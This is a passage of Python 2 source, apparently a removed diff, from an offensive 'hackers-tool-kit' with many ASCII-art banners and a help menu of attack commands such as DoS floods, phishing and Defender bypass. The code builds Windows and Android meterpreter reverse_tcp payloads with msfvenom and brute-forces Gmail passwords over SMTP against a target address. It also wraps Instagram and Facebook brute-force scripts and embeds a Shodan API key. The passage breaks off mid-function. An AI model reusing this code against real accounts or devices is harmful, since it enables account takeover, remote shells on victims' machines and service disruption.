░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,19) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = 